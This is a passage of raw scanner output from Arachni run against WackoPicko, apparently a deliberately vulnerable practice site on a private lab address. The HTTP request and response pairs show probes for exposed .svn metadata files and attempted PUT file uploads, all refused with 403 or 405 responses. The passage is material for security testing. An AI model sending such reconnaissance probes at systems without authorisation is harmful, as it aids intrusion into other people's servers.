    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/3/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/3/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/pictures/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 206
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/pictures/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/pictures/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 200
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/pictures/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:50:08 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
